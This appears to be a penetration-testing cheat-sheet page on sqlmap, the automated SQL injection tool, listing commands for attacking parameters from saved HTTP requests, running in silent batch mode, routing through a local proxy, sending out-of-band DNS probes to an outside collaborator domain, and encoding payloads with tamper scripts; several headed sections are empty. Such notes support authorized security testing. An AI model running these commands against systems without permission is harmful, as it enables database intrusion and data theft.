search

SQLmap

Automate SQL Injections

hashtag
Documentation

https://github.com/sqlmapproject/sqlmap/wiki/Usagearrow-up-right

hashtag
From Request - HTTP:80

sqlmap -r http.request -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080

hashtag
From Request - HTTPS:443

sqlmap -r http.request --force-ssl -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080

or the http.request file needs to have special HTTP header Host: server:443

hashtag
Batch Silent Mode without questions

sqlmap -r http.request --force-ssl --answers="follow=Y" --batch

hashtag
DNS Collaborator (under root)

Tip: register new HTTP proxy on port 8081 and send all probes from sqlmap to this lister in order filter proxy history based on sqlmap listener.

Use --dns-domain switch to instruct nmap use DNS probes against your collaborator server

sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8081 --dns-domain e7mxq58krq154r5ka6wess5el5ryfo3d.oastify.com --risk=3 --level=5

hashtag
Tampering

Tampering scripts for payload encoding using --tamper switch.

A list of all existing tampering scripts is available using --list-tampers switch or looking at github repository /tamper folder

Logosqlmap/tamper at master · sqlmapproject/sqlmapGitHubchevron-right

hashtag
URL target & Parameters

You can read HTTP request from a file addressing payload by asterix symbol (*).

hashtag
HTTP Proxy

hashtag
Databases

The most common DBMSs the remaining ones look at sqlmap wiki --dbmsarrow-up-right.

hashtag
Base64 Encoding

By default sqlmap encode values in query string by URL encoding. When you need to encode payload using base64 encoding use the following switch with a parameter name

hashtag
HTTP method - DELETE

PreviousBlind SQL InjectionNextNoSQL Injection

Last updated